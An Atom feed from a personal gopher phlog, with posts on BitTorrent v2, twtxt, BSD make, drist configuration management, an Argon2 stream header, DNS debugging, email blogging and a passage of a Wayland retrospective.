<?xml version="1.0" encoding="UTF-8" ?>
<feed xmlns="http://www.w3.org/2005/Atom">
 <title type="text">z3bra.org phlog</title>
 <subtitle type="text">Proudly powered by smtpd(1)</subtitle>
 <id>gopher://phlog.z3bra.org/h/atom.xml</id>
 <link href="gopher://phlog.z3bra.org/h/atom.xml" rel="self" />
 <link href="gopher://phlog.z3bra.org/1/" />
 <updated>2024-05-05T02:40:32+02:00</updated>
<entry>

              <title><![CDATA[BitTorrent specification v2]]></title>

              <id>gopher://phlog.z3bra.org/0/bittorrent-specification-v2.txt</id>

              <link href="gopher://phlog.z3bra.org/0/bittorrent-specification-v2.txt" />

              <updated>2020-09-08T21:22:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          BitTorrent specification v2
──────────────────────────────────────────────────────────────────────
Libtorrent recently released their work on the bittorrent v2 spec [0].

Given their widespread usage, it will certainly help adoption of the spec
in other clients !

This could be a good time for me to blow the dust out of libeech [1], my
Bittorrent library that was never finished, and apply some of the idioms
I recently learnt.

Maybe it will reach a usable state someday ?
--
~wgs

[0]: https://blog.libtorrent.org/2020/09/bittorrent-v2
[1]: git://z3bra.org/libeech.git

20200908.2122]]></content>

              </entry>
<entry>

              <title><![CDATA[Broader protocol support for TWTXT]]></title>

              <id>gopher://phlog.z3bra.org/0/broader-protocol-support-for-twtxt.txt</id>

              <link href="gopher://phlog.z3bra.org/0/broader-protocol-support-for-twtxt.txt" />

              <updated>2020-10-21T22:49:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                   Broader protocol support for TWTXT
──────────────────────────────────────────────────────────────────────
I recently found a microblogging platform: twtxt [0].

Its main selling point is that it's decentralized and minimalist. The
concept is simple: write your thoughts in a plain text file, one per
line, prefixed with the date, and share it with others [1] :

2020-10-21T21:34:47+02:00        I am trying twtxt!
1970-01-01T00:00:00+00:00        It's a Unix system!

You « follow » people by fetching their twtxt.txt file periodically,
and display all entries sorted by date. Multiple clients exist, and the
format is simple enough to build a working client in a few minutes.

Once your file is updated, you must share it with other users. There is
a myriad of network protocols that can be used for this purpose: gopher
of course, but also gemini, IMAP, FTP, SSH, SMB, WebDav, ... Heck,
even HTTP !

However, as I found out after a few days of using it, all clients and
user directories (registry.twtxt.org, twtxt.tilde.institute, twtxt.xyz,
..) only support HTTP links. This doesn't really fit the « built for
hackers » and « minimalist » promise from the description.

I love the simplicity of the specification. All it does is specify a
format for people to share thoughts around the world, in the most
elegant way possible: plain text. This leaves the door open to so many
ways to share and update this file, and enforcing the use of HTTP on
its users can only disserve it. The gopher and gemini communities are
particularly aware of the beauty of plain text, and twtxt totally fits
this universe, so I think it would clearly be a benefit to just not
exclude them.

This post is a call to developers to add more protocol support to their
twtxt clients. Not everyone is running an HTTP server, or wants to.

Let's make twtxt truly decentralized, and open !
--
~wgs

PS: I would like to say « thank you » to vain [2][3] for being the
first person ever to follow me, and mention my name on twtxt, thus
proving that it's possible !

[0]: https://twtxt.readthedocs.io
[1]: gopher://g.nixers.net/0/~z3bra/twtxt.txt
[2]: gopher://uninformativ.de
[3]: https://www.uninformativ.de/twtxt.txt
20201021.2249]]></content>

              </entry>
<entry>

              <title><![CDATA[BSD make and built-in rules]]></title>

              <id>gopher://phlog.z3bra.org/0/bsd-make-and-builtin-rules.txt</id>

              <link href="gopher://phlog.z3bra.org/0/bsd-make-and-builtin-rules.txt" />

              <updated>2020-09-09T18:44:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          BSD make and built-in rules
──────────────────────────────────────────────────────────────────────
I just realized a specificity of BSD make: there is no built-in
rule to link a program for which you specify the object
prerequisites.

Take the following makefile, BSD make will automatically compile it
as expected:

       $ more -e makefile
       pgm: pgm.c

       $ make
       cc -O2 -pipe    -o pgm pgm.c

Now try to make it generate an object file (the second line could be
inferred by make, but I added it for clarity):

       $ more -e makefile
       pgm: pgm.o
       pgm.o: pgm.c

       $ make
       cc -O2 -pipe   -c pgm.c

The target "pgm" is NOT generated !

This is actually what the POSIX spec for make specifies [0].
There is no built-in rule to build a target from a .o file, only
from a .c file. And if you think about it, it makes sense, because a
single suffix rule to turn a .o into a binary would only work if your
binary doesn't link multiple objects. So you'd better avoid creating
the object file in this case, and use the .c rule…

It means that when a binary must be built out of multiple object
files, you have to specify the target rule:

       pgm: pgm.o util.o
               $(CC) $(LDFLAGS) -o $@ pgm.o util.o
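Putting it together, a minimal makefile for that two-object program
could look like this sketch (the explicit link rule is spelled out,
while the .o files still come from the built-in .c.o inference rule;
recipe lines must start with a tab):

```makefile
OBJ = pgm.o util.o

pgm: $(OBJ)
	$(CC) $(LDFLAGS) -o $@ $(OBJ)

clean:
	rm -f pgm $(OBJ)
```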

I guess I'll be rewriting makefiles in the next few days…
--
~wgs

[0]: https://pubs.opengroup.org/onlinepubs/009695399/utilities/make.html#tag_04_84_13_08

20200909.1844]]></content>

              </entry>
<entry>

              <title><![CDATA[Configuration management]]></title>

              <id>gopher://phlog.z3bra.org/0/configuration-management.txt</id>

              <link href="gopher://phlog.z3bra.org/0/configuration-management.txt" />

              <updated>2020-08-24T11:32:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                             Configuration management
──────────────────────────────────────────────────────────────────────

Automation.

This is a fairly vast topic, so let's start from the beginning.

# Principles

The first thing to do after setting up a server is configuring it,
and then the services that it will run.

This includes the following:

- Nameservers
- Installed packages
- Running services
- Service configurations
- …

Performing these configurations (in their simplest form) means creating
files on the server, and running specific commands.

Many tools are available to automate this process:

- [ansible][0]
- [puppet][1]
- [chef][2]
- …

Each of them has its own strengths, and a declarative language used
to describe the server state.
All of them require you to learn a new DSL, a new language, to
perform the tasks you would expect.

There has to be a simpler way.

As a sysadmin, and long-time Linux and BSD user, the language I'm the
most familiar with is the shell.
And as you certainly guessed, there is a tool for that !

# drist(1)

By relying only on ssh(1) and rsync(1), [drist][3] is the simplest
configuration management tool I know of.

It works in a centralized fashion. You first create a module on the
deployment machine:

       gopherhole/
       ├── files/var/gopher/index.gph
       └── script

The script file may contain whatever is needed to configure the service:

       #!/bin/sh
       pkg_add geomyidae
       rcctl enable geomyidae
       rcctl start geomyidae

Then you apply the module on your server with:

       cd gopherhole
       drist -ps [email protected]

Everything in `files` will be uploaded to the server "as-is". Once all
files are deployed, the `script` file will be uploaded, executed over
ssh(1), and then deleted.

All you need is an ssh connection to your server!
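Conceptually, applying a module boils down to two steps; here is a
local stand-in sketch (real drist transports everything with rsync(1)
over ssh(1) to the remote host; DESTDIR stands in for the server's
root filesystem, and all paths and contents below are made up):

```shell
# drist-like "apply module" sketch, against a local DESTDIR instead
# of a remote server, so the two steps are easy to see.
module=gopherhole
DESTDIR=$(mktemp -d)
mkdir -p "$module/files/var/gopher"
printf 'hello gopher\n' > "$module/files/var/gopher/index.gph"
printf '#!/bin/sh\necho configured\n' > "$module/script"

# 1. everything under files/ is deployed to the target root "as-is"
cp -R "$module/files/." "$DESTDIR/"

# 2. the script is uploaded, executed on the target, then deleted
cp "$module/script" "$DESTDIR/script"
sh "$DESTDIR/script"
rm "$DESTDIR/script"
```

Running it prints « configured », and the target root ends up holding
/var/gopher/index.gph, with no trace of the script left behind.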

Per-server configuration files can be uploaded by naming the `files`
directory `files-FQDN`. These files will then be uploaded only to
the server whose FQDN matches the directory name.

# Rationale

I love simple tools.

Over the years, I got to use both chef and puppet in enterprise-grade
environments.
They work well for environments with thousands of servers,
and their greatest advantage is that they provide a client/server
configuration. Thus, centralization is built-in and makes it great to
work in a team.

Over the years I built a few servers to host various services, like
emails, httpd, gopher, git, … Whatever.
Setting up these servers is fun, but at some point I lost track of
everything I did. At first I wanted to document it all, but documentation
is doomed to lag behind at some point, so I figured the best way to
"document" it would be to automate the whole configuration, so replicating
it would only be a matter of commands I can easily read, and run again
when needed.

This is where drist(1) comes into play. Because it is shell-first, and
essentially a local mirror of your configuration files, it is fairly
easy to understand what it does.

In the past few months, I've slowly been migrating all my server
configuration to drist, and ensuring that I could apply any module at
any time without breaking anything. Some notable modules I made are

- gopherhole - publish notes in my gopher hole
- acme - check/update let's encrypt certificates
- ssh_keys - deploy my SSH keys
- syspatch - patch/upgrade OpenBSD servers

Configurations have never been so quick & easy !

[0]: https://ansible.com
[1]: https://puppet.com
[2]: https://chef.io
[3]: gopher://dataswamp.org/0/~solene/article-drist-intro.txt

20200824.1132]]></content>

              </entry>
<entry>

              <title><![CDATA[CREAM header for encrypted streams]]></title>

              <id>gopher://phlog.z3bra.org/0/cream-header-for-encrypted-streams.txt</id>

              <link href="gopher://phlog.z3bra.org/0/cream-header-for-encrypted-streams.txt" />

              <updated>2022-10-24T14:15:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                   CREAM header for encrypted streams
──────────────────────────────────────────────────────────────────────
Symmetric encryption is a crypto algorithm where the same key is used to
encrypt _and_ decrypt data. As opposed to asymmetric encryption, where
there are two keys: one to encrypt, and the other to decrypt data.

While this sounds more convenient because there is only one key to
manage, symmetric crypto comes with a complex challenge: sharing the key
with the other party.
Whoever has the key can decipher the message, so extra care should be
taken when sharing it with anyone. There are many ways to securely share
a key, and one of them is to use Key derivation functions, or KDF.

Key Derivation Function (KDF)
-----------------------------

The idea behind this method is that, rather than sharing the actual key,
the other party should be capable of recreating it, based on a secret
value known to both parties (a passphrase for example). There are many
algorithms to choose from for this purpose, but the best solution as of
today (late 2022), is the Argon2[0] algorithm.

Argon2 is well suited for this purpose, because it maximizes the cost
an attacker has to pay to recreate the key from a secret, making
brute-force attacks a non-viable solution.

The algorithm takes multiple parameters into account:

- Secret - the password to generate a key from
- Salt - Arbitrary data used to randomize key output
- Memory cost - how much memory is needed to compute the key
- Time cost - how many times to pass over that memory
- Parallelism - how many concurrent threads to use

If you change one of these parameters, the resulting key will be totally
different. This means that all these parameters must be known to both
parties for the encrypted conversation to happen.

While the secret must be kept, well..., secret, hiding the other
parameters is not needed at all. For convenience, they can thus be
shared directly with the ciphertext, so the person decrypting it only
has to know the secret.

CREAM header
------------

This is where the CREAM header chimes in. Its sole purpose is to provide
all these parameters to the decryption side in a compact header, to help
with key derivation.

Version 1.0 of the header is made specifically for Argon2:

 +-------+-------+------+------+----+-----------+----+
 |CREAM\1|VERSION|BLKSIZ|MEMORY|TIME|PARALLELISM|SALT|
 +-------+-------+------+------+----+-----------+----+

Full header size is 40 bytes, and includes all the information needed to
decipher the data appended to it.
For more details, take a look at the cream(5)[1] manual page.

Because it is prepended to the data, the payload (encrypted data) can
be of any size, which allows encrypting streams of arbitrary length.

I've implemented this format in the cream[2] utility, as a reference
implementation, as well as in my personal secret manager, safe[3].
--
~wgs

[0]: gopher://z3bra.org/d/notes/argon2.pdf
[1]: gopher://z3bra.org/0/man/cream.5
[2]: gopher://z3bra.org/0/projects/cream.txt
[3]: gopher://z3bra.org/0/projects/safe.txt

20221024.1415]]></content>

              </entry>
<entry>

              <title><![CDATA[Debugging DNS propagation]]></title>

              <id>gopher://phlog.z3bra.org/0/debugging-dns-propagation.txt</id>

              <link href="gopher://phlog.z3bra.org/0/debugging-dns-propagation.txt" />

              <updated>2020-09-19T15:20:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                            Debugging DNS propagation
──────────────────────────────────────────────────────────────────────


I recently made a subdomain for phroxy(1), my http to gopher proxy [0].
In the process, I realised I had a resolution issue when accessing it
(even after 72 hours). Sometimes I could access the domain, sometimes
I couldn't. At the time I used some random DNS resolvers, so I tried
to resolve the name directly at the source (my own DNS servers), and
it resolved as expected... Weird issue.

I tried a bunch of DNS propagation maps on the web, and it showed that
barely 20% of worldwide servers could resolve this specific name, while
resolving another, old name on the same machine hit 100% resolution.
I first thought about the sequence number, but it was correctly updated
(I even incremented it again, to be sure).

Then a colleague of mine gave me the key to this problem:

   dig +trace phroxy.z3bra.org

That `+trace` here is the key. It shows which servers are contacted to
resolve your name, kind of like what traceroute does for ICMP. And it
would never reach the servers pointed to by the NS records of my zone.
So my zone was fucked up somewhere, in a way that prevented the DNS
servers from being selected as authoritative on the zone.

After taking a closer look at the zone, I found the issue, in the very
first line:

   $ORIGIN rg.

The full domain was cropped! It should have read « $ORIGIN z3bra.org.
». As I use short domain names in my zone, the $ORIGIN is there to
complete the FQDN, and it wasn't doing it with the correct domain !
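For reference, this is how $ORIGIN completes short names in a zone
file (the record below is made up for illustration):

```
$ORIGIN z3bra.org.
phroxy  IN  A  203.0.113.7  ; short name, expands to phroxy.z3bra.org.
```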

I fixed that line, incremented the seqnum, and deployed the zone again.
Problem solved.

The real game-changer for me was `dig +trace`. I never used it before,
but it's definitely going in my debugging toolbelt !
--
~wgs

[0]: git://z3bra.org/phroxy.git

20200919.1520]]></content>

              </entry>
<entry>

              <title><![CDATA[Email blogging with scribo(1)]]></title>

              <id>gopher://phlog.z3bra.org/0/email-blogging-with-scribo1.txt</id>

              <link href="gopher://phlog.z3bra.org/0/email-blogging-with-scribo1.txt" />

              <updated>2020-09-08T15:44:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                        Email blogging with scribo(1)
──────────────────────────────────────────────────────────────────────
A while ago, prx [0] and I had a discussion about blogging through
emails.

The idea is simple: send an email to a specific address, and the blog
entry is automatically added to your log.

A mail client is all you need to share your content!

So we had this idea, and I honestly totally forgot about it, until
recently. prx actually released such a tool, under the cool name of
"prose" [1].

I found it so cool that I had to give it a shot!

       git://z3bra.org/scribo.git

It is still in its early stages, and I barely got something working.

BUT IT WORKS !

I added the following to my /etc/mail/aliases:

       [email protected]    |/usr/local/bin/scribo -o index.gph

Whenever I receive a mail at this address, it creates a log entry and
generates the index file in a specific directory, owned by user _smtpd.

Every 5 minutes, a cron job rsync(1)s the whole directory to my gopher
server, for sweet publishing of content (my mail and gopher servers are
different machines, making that setup a little bit more complex).
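Such a sync job is a one-liner in a crontab; a hypothetical version
(the local path and hostname below are made up):

```
*/5 * * * * rsync -a /var/scribo/ gopher.example.org:/var/gopher/
```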

To ensure that only I can publish notes, the From: field of all
incoming emails is verified, ensuring the sender is indeed me.

I'll be trying it for a while, and if it works, I'll make it
available in /phlog on this server.

Stay tuned !
--
~wgs

[0]: https://prx.ybad.name
[1]: https://ybad.name/Logiciel-libre/Code/C/prose.html


20200908.1544]]></content>

              </entry>
<entry>

              <title><![CDATA[Gopher text rendering ideas]]></title>

              <id>gopher://phlog.z3bra.org/0/gopher-text-rendering-ideas.txt</id>

              <link href="gopher://phlog.z3bra.org/0/gopher-text-rendering-ideas.txt" />

              <updated>2020-09-23T17:22:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          Gopher text rendering ideas
──────────────────────────────────────────────────────────────────────

TL;DR: I would like to try a gopher client using monospaced and
proportional fonts.

Gopher is a text-based protocol, and as such is mainly used to share
text files.

Plain text doesn't come with any formatting, like what HTML or LaTeX
would provide. As such, gophernauts assume all clients use at least a
70 char wide display, and a monospace font.
If you take this paragraph, there is absolutely no added value for it
to wrap at 70 characters. Proportional fonts are usually more pleasant
to read. They're also more compact, meaning you can fit more text on a
page.

However, you need a monospaced font so this cute zebra doesn't look
like a gull:

             ,,
      ______/ ¨/)
  *~'(///////
      ||   ||
      ""   ""

This makes use of a technique called "preformatted text".

So I had an idea. What if a client used proportional font for text
blocks, and monospace for preformatted text ?

You would need a way to figure out what is preformatted, what is raw
text, and find the delimitation between both.

The delimitation is easy. It's the same as with paragraphs: a new line.
Whenever there is a new line character on its own, it means you get to
start a new paragraph.

Now what could be the difference between raw, and preformatted text ? I
thought about it, and I think that the main difference is the use of
white spaces.
When you write text, you really only need to put one space between
words (maybe two after a sentence).
However, with preformatted text, you (almost) always have to use
whitespace for formatting. Be it to draw ascii art, or align stuff.
Which means that you're very likely to find multiple whitespaces glued
together.

So how would that work ?

The client would read the text data from the server, and buffer the
input (that's mandatory!). You would need to buffer at least one
paragraph, so buffer until you read 2 sequences of CRLF (or LF).
Now you got a full paragraph. You can check inside for multiple
occurrences of whitespace, say at least 3 in a row.

If you find 3 whitespaces, then the paragraph is "preformatted". You
would then display it using a monospaced font. For anything else, use a
proportional font.
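This heuristic fits in a few lines of awk; a naive sketch (paragraph =
blank-line-separated record, a run of 3 spaces = preformatted):

```shell
# Tag each paragraph "pre" or "text" using the whitespace heuristic.
classify() {
	awk 'BEGIN { RS="" }              # empty RS: read paragraph records
	     /   / { print "pre"; next }  # 3 spaces in a row => preformatted
	            { print "text" }'     # anything else => regular text
}
printf 'some plain words\n\n   ||   ||\n   ""   ""\n' | classify
```

which prints « text » for the first paragraph and « pre » for the
second (the little ascii art).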

This is a pretty naive approach, yet it seems simple enough to work.
I'll see if I can get something working, and see how it goes.
--
~wgs

20200923.1722]]></content>

              </entry>
<entry>

              <title><![CDATA[Happy time_t party!]]></title>

              <id>gopher://phlog.z3bra.org/0/happy-timet-party.txt</id>

              <link href="gopher://phlog.z3bra.org/0/happy-timet-party.txt" />

              <updated>2020-09-13T12:26:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                  Happy time_t party!
──────────────────────────────────────────────────────────────────────

Today is a special event in the Unix timestamp history.

At 12:26:40 UTC, on September 13th 2020, the timestamp reached
1600000000. Next major event will be in 3 years, for the next round
number, so see you there !
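A quick shell arithmetic check of that « 3 years » claim, assuming the
next round number meant is 1700000000:

```shell
# 100000000 seconds between the two round numbers, in (integer) years:
echo $(( (1700000000 - 1600000000) / 86400 / 365 ))  # prints 3
```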
--
~wgs

20200913.1226]]></content>

              </entry>
<entry>

              <title><![CDATA[IDEA: multipart/mixed support for scribo]]></title>

              <id>gopher://phlog.z3bra.org/0/idea-multipartmixed-support-for-scribo.txt</id>

              <link href="gopher://phlog.z3bra.org/0/idea-multipartmixed-support-for-scribo.txt" />

              <updated>2020-10-06T17:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                             IDEA: multipart/mixed support for scribo
──────────────────────────────────────────────────────────────────────

I am writing this post from my phone, somewhere on Réunion island.
This place is beautiful, majestic ! I crossed mountains one day, dove
among corals the next, eating delicious food and meeting even more
delicious people.

I've been away from a computer for the last 2 weeks, and as such didn't
work on or play with anything technical I could share on this phlog.
However, I still did some stuff worth sharing, because this island is
so beautiful.

Unfortunately, my phlogging « engine », scribo(1), which converts
emails to phlog entries, only accepts text/plain mimetypes. I figured
this would be sufficient, given that gopher is a text-oriented
protocol. However, I realize here that I would like to share more than
just plain text. At least pictures. So I think the next improvement to
scribo would be supporting image/* mimetypes, first as an entry of
their own, using the subject as a legend, and then support for, maybe,
multipart/mixed, so I could send text with images, and reference them.
I'll have to read the RFC a bit to know how that works, but that
could definitely be a great improvement. At least it would fill the gap
I'm missing today...

In the meantime, I'll upload some pics manually from my phone (thanks
sailfishos that I can use rsync(1) natively!), so I can share them here.

Peace, love, phlog 💋
--
~wgs

20201006.1742]]></content>

              </entry>
<entry>

              <title><![CDATA[I'm on Lemmy now!]]></title>

              <id>gopher://phlog.z3bra.org/0/im-on-lemmy-now.txt</id>

              <link href="gopher://phlog.z3bra.org/0/im-on-lemmy-now.txt" />

              <updated>2023-07-05T21:38:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                    I'm on Lemmy now!
──────────────────────────────────────────────────────────────────────

Following reddit's decision to monetize their public API, I decided to
simply get off the platform. I'm however a fervent lurker, and love to
mindlessly scroll through links and memes posted by random people.
Luckily for me, a bunch of nerds were already working on a
decentralized link aggregator: Lemmy[0] (see also kbin[1]).

It's a link aggregator one can self-host, but which can talk to other
software involved in the « Fediverse ». Long story short, all servers
can communicate together, and with an account created on website A, you
can read, post and comment on website B. Many programs use this
principle of federation, starting with email (but also Mastodon,
Matrix, …).

Because of reddit's fuckery, the « Lemmyverse » exploded, and saw a
massive influx of users looking for a better land to post memes (and
I'm definitely one of them).

I decided to join through the SDF instance[2], as it's the community I
feel closest to because of their interest in reviving old tech! I
never had the occasion to create an account there because I already
selfhost my own website, gopherhole and every other service they
propose, but this time I have no interest (yet) in running my own
Lemmy instance, so it's the perfect time to be one of them, yay!

You can now contact me on lemmy as @[email protected][3], see you there!
--
~wgs

[0]: https://join-lemmy.org
[1]: https://kbin.pub
[2]: https://lemmy.sdf.org
[3]: https://lemmy.sdf.org/u/wgs


20230705.2138]]></content>

              </entry>
<entry>

              <title><![CDATA[KVM switches for the desktop]]></title>

              <id>gopher://phlog.z3bra.org/0/kvm-switches-for-the-desktop.txt</id>

              <link href="gopher://phlog.z3bra.org/0/kvm-switches-for-the-desktop.txt" />

              <updated>2020-12-16T04:50:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                         KVM switches for the desktop
──────────────────────────────────────────────────────────────────────
Whether we want it or not, the 2020 pandemic changed the way the
industry works. For me, it meant working remotely 90% of the time. I
could bring my company's docking station, screen and laptop home, to
work from here. This sounded cool until I realized how small my « desk
» really is [0] ...

On this desk are connected my personal computer (tower build), work
laptop (docked) and a PS4. I can fit them all on this desk ! Hooray !
What's tedious though, is switching between them. Let's consider 2 use
cases:

- Switching from my tower to PS4
- Switching from my tower to the laptop


So here I am, chatting on IRC or browsing the gopher space on my
computer, when a friend calls me up to play video games. It takes quite
a few steps:

1 - Turn on the PS4 using the controller
2 - Plug in my headphones to the controller
3 - Switch monitor input to HDMI
4 - Replug the mouse from my tower to the PS4
5 - Plug a new keyboard to the PS4

And I'm set ! A few explanations here. I must plug headphones to the
controller because the PS4 only has 2 USB ports, which I use for
keyboard and mouse. And as my monitor doesn't have speakers, I must use
the controller for sound output.
I use another keyboard rather than the one currently plugged in, to
avoid unplugging 2 devices from my tower. It's more "convenient". When
I'm done, I just put it away. When switching back to my tower, I just
do the same tasks in reverse.


Now, here is my « working commute » (switching from tower to work
laptop) :

1 - Turn on/wake up laptop from the dock
2 - Switch monitor input to Display port
3 - Turn on the wireless mouse
4 - Swap cable connected to my keyboard

This is a bit simpler. I use a wireless mouse plugged to the dock so I
don't have to swap my main mouse which is plugged behind my desk, and
thus hard to reach. Same goes for the keyboard, which is why I have two
cables that I can plug to the keyboard to « switch » computers. So
switching between my tower and work laptop doesn't require going under
the desk, Yay !



You certainly understand how tedious this is, and when I heard that we
might eventually keep working remotely for a few more months, I decided
it was time to optimize that workflow. That's when I bought a KVM
switch, which stands for « Keyboard, Video, Mouse switch » [1].

It's a device that lets you connect your keyboard, video and mouse to
different computers, and switch between them with a simple button
press. I bought one with 4 inputs, with HDMI support. Its main
advantage is its compactness, and that plugs are packed on only 2
sides, helping with cable management.

Since I have this device, switching between my 3 computers is as simple
as pressing a button ! I use the same mouse/keyboard every time, which
is much more comfortable as well.

I thought that KVM switches were a datacenter thing. Nope, and I wonder
how I did without them all these years !
--
~wgs

[0]: gopher://z3bra.org/I/u/tiny_desk.jpg
[1]: gopher://z3bra.org/I/u/kvm_switch.jpg

20201216.0450]]></content>

              </entry>
<entry>

              <title><![CDATA[My love-hate relationship with Wayland]]></title>

              <id>gopher://phlog.z3bra.org/0/my-love-hate-relationship-with-wayland.txt</id>

              <link href="gopher://phlog.z3bra.org/0/my-love-hate-relationship-with-wayland.txt" />

              <updated>2020-11-06T17:28:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                               My love-hate relationship with Wayland
──────────────────────────────────────────────────────────────────────
# The X windowing system, and me

It took me years to come up with the X11 setup I currently have. I had
to learn Xlib and XCB programming in the process, because I wanted an
experience so sweet and tailored to my needs that I wrote a shitload
of tools [0][1][2][3][4], just for the sake of learning how the
venerable X.org server works internally.
I learnt a lot of stuff in the process. About the X protocol and
libraries, of course, but not only.
Because of the complexity of its interface and architecture (I'm not
saying this in a pejorative way!), I had to learn how to read the
documentation (XCB ? Documentation ?), understand its inner concepts,
organize my code better and force myself into a discipline I didn't
have before.

Building programs for my X environment also helped me think about what
I need to feel comfortable when using my computer. What makes my
workflow more fluid, or what slows me down.
I quickly realized that tiling window managers were not for me for
example, and that I need a quick way to move windows to the opposite
side of the monitor, in a different size. That's why cwm(1) quickly
became my best friend for managing windows. When I wrote glazier [3]
later, I used cwm as my model, and ended up creating a somewhat
stripped-down version of it, on top of XCB rather than Xlib !


Then came Wayland.

[0]: https://github.com/wmutils/core
[1]: https://github.com/wmutils/opt
[2]: git://git.z3bra.org/xmenu.git
[3]: https://z3bra.org/glazier
[4]: https://z3bra.org/man/ewmh

# Wayland, take one (2014)

I first really heard about Wayland a few years ago, back when I was
discovering Linux, and especially the aesthetics of a Linux desktop.
At the time, I was trying hard to make my desktop look good to me, and
was spending much more time "improving" my workflow, rather than doing
any real work.
It was pretty fun though, and helped me get into the deepest corners of
my operating system configuration, including replacing the init system
just so my "ps" output could fit on a single terminal page !

During my explorations, I stumbled upon a video showcasing a 3D Wayland
compositor [5]. The video shows a 3D world where the user navigates
like in an FPS game, puts application windows on the walls, and moves
between them by "walking around" the desktop.

THAT WAS SO COOL ! So I looked into this "Wayland" thing, and discovered
that this was a competitor to the well-known X server, which I was still
experimenting with, but was slowly starting to show its limits in terms
of customisability.

I read the Wayland introductory post, and started looking into how I
could test it out, and what could be *actually* done with it. And as it
turned out… Not much.

Back in the day (around 2014), the only "viable" option was to use
weston, a compositor made to showcase Wayland, rather than do any actual
work. It featured a terminal (weston-terminal), but that's pretty much
it. You couldn't even get a web browser running, so that was FAR from
usable. I wanted to do customizations, tuning, modifications, try new
concepts… Not feel stuck in a totally meaningless desktop environment.

And so I did what every IT hobbyist in the Unix world does when a new
technology appears to "replace" an older one: join the hate bandwagon !

It was pretty easy to hate it at that time. It was advertised as the
new challenger, yet nobody had adopted it, nothing useful had been made
out of it, and the only "documentation" was the code of the single,
useless application available: weston.
I remember trying to read that code, and I was so horrified that it
reinforced my hate against it. It was at that time that I decided that
X.org wasn't going anywhere, and that I could invest some more time to
learn how it works internally and start making software for it. We (dcat
and I) came up with wmutils [0], which is to this day the most "famous"
software I wrote, even though it targets a small niche.

[5]: https://youtu.be/_FjuPn7MXMs

# The Plan9 operating system

Years passed, and I stopped caring about how my desktop *looked*,
concentrating instead on what I could *do* with it. I started
contributing to more meaningful software: data deduplication [6] for
backing up my family pictures, secure password storage [7], and so on…

I also started looking into other operating systems, mostly OpenBSD
(which powers all my servers!), and Plan9.

Plan9 was a fascinating discovery at the time. The system was so
elegant and consistent that even OpenBSD looked messy compared to it
(not even mentioning Linux !).
Ever since I discovered it, I've admired it without ever giving it a
try. Not even plan9ports ! I have however read the research papers
quite a few times, and integrated some of the concepts in my day-to-day
computer usage, like embracing the mouse for the right use cases,
rather than being a "TILING WM FTW, LUV KEEB, MOUSE SUCKS LOL" kind
of guy.

[6]: git://git.2f30.org/dedup.git
[7]: https://z3bra.org/safe

# Wayland, take two (2019)

A couple of years passed, and I started hearing about Wayland more and
more. There was this guy who created a simple WM for Wayland, "swc",
and everyone was so enthusiastic about it!

This was the first time I heard about someone doing ACTUAL work for
Wayland. Of course, I had heard about GTK and Qt providing bindings for
it, but that didn't really interest me. This new window manager,
however, was proof that real work was starting on Wayland. Then came
"sway", the compositor meant to be the i3 window manager for Wayland.
Later on, a new library named "wlroots" came out of it, and started
gaining widespread usage.
I heard about more and more people successfully "switching to wayland
for the desktop", and I started being curious again. I looked into some
Wayland articles here and there, out of curiosity rather than from real
interest…

Then Drew Devault, the creator of the famous "wlroots" library, posted
this article:

https://drewdevault.com/2019/05/01/Announcing-wio.html

It announced the initial release of "wio", a Wayland compositor
replicating the rio(1) window manager from Plan9. THAT WAS SO COOL !
I had read about rio multiple times when looking at Plan9, and tried to
replicate its usage under X multiple times, in vain. And this guy came
up with a Wayland compositor doing exactly that ?
This was the time for me to stop hating on Wayland, and actually look
into it. I started reading about it as a protocol, as a library, how it
differs from the X server, and why that is a good thing.

To be totally honest: I didn't understand. It was still too complex for
me, and I started hating it again, this time for a *real* reason: I
could not understand it. From the other feedback I got, many things
were still imprecise or not working. Most people on Wayland had to
resort to "Xwayland", which lets them run X software under Wayland. It
felt hacky, and I decided I didn't want Wayland anymore.


# Crux, OpenBSD and the lost drives

By the end of 2019, I bought myself an SSD for my workstation, deciding
that recycling old hard drives was great for the planet, but not so
great for my sanity. Reinstalling your OS every time a drive fails is
good for practicing and cleaning up, but it gets boring over time.
When I got that SSD, I decided to try OpenBSD as a workstation, and
slapped it on real quick. I was happy, until I realized that I could
not mount my existing /home and /var/data partitions, because I had
used LVM to partition the 1TiB hard drive that stores all my data.
That's how the SSD gathered dust.

By the end of the year, a pandemic known as Covid-19 struck the whole
world, and eventually resulted in a full country lockdown in March 2020.

This left me with a lot of time on my hands to finally do things that
had been sitting on my TODO list for a while, including setting up a
good backup system for my data. That was fortunate, because a few weeks
later my 1TB drive died spectacularly, taking with it all my data, and
my /home partition.

It was only a few months later that I replaced the failed drive. This
time I decided to go for a filesystem I could use on both Linux and
OpenBSD, which is, well, nothing actually.

The only filesystems common to Linux and OpenBSD are FAT32 and ext2,
which I didn't want to use at all. So I gave up on OpenBSD, and decided
to reinstall my current OS, Crux [8], on the SSD whenever I'd find some
time.

[8]: https://crux.nu

# Wayland, take three (2020)

Tech news come in waves. You don't hear about something for months or
years, and all of a sudden, everyone is debating it !
This happened with Wayland, up to the point where I read a post about
X.org being tagged as "abandonware" [9]. This article made a lot of
noise in the Wayland community and got many replies [10][11][12][13].
These discussions convinced me that Wayland was now usable, and I
decided to look into it. Again.

And so I did…


[9]: https://www.phoronix.com/scan.php?page=news_item&px=XServer-Abandonware
[10]: https://lobste.rs/s/vqv6nu/it_s_time_admit_it_x_org_server_is
[11]: https://ajaxnwnk.blogspot.com/2020/10/on-abandoning-x-server.html
[12]: https://lobste.rs/s/qtplaa/on_abandoning_x_server
[13]: https://arewewaylandyet.com

